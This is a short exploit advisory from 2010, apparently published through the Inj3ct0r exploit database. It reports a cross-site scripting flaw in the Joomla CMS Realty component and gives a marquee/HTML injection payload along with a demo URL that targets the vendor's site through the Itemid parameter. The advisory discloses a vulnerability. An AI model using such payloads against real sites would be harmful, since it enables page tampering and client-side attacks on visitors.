The Joomla CMS Realty component suffers from a cross site scripting vulnerability.
c7de8534d9bff962fae4cb1e7fce50915cfe8096f3963037e8058777a42273f6
===================================================
Joomla com_cmsrealty Xss Vulnerability
===================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_cmsrealty Xss Vulnerability
Date : june, 19 2010
Vendor url :http://cmsrealty.org/
Critical Level : LOW
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
CMS Realty integrates the Open-Realty Real Estate Listing Management System with the Joomla Content Management System. Combining the best Content Management System with the best Real Estate Listing Management System provides a powerful and flexible website solution for real estate agents, agencies and portals.
In addition, while Open Realty is designed for Real Estate, it can easily be changed for any type of listings. I've seen it used for car dealerships, RV sales, boat sales, job listings, an escort service, general classifieds, and a lot more.
#######################################################################################################
com_cmsrealty suffers from Xss Vulnerability
Xploit:Xss Vulnerability
Attack pattern : ">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
DEMO URL :http://cmsrealty.org/index.php?option=com_cmsrealty&Itemid=[XSS]
###############################################################################################################
# 0day no more
# Sid3^effects